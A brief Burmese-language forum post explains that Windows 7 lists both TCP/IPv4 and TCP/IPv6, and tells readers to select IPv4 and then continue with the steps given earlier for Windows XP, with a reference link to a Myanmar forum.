ဝင်းဒိုး 7 မှာကျတော့ internet protocol က Internet Protocol Version 4 (TCP/IPv4) နဲ့ Internet Protocol Version 6 (TCP/IPv6)၂ခုရှိလိမ့်မယ်..အဲဒီမှာ Internet Protocol Version 4 (TCP/IPv4) ကိုရွေး ပြီးရင် XP မှာပြောပြထားတဲ့အတိုင်း ဆက်လုပ်သွားရုံပဲ..နော်

ref: http://s4.zetaboards.com/myanmar/search/?c=3&mid=3255593&month=1&year=2011

Search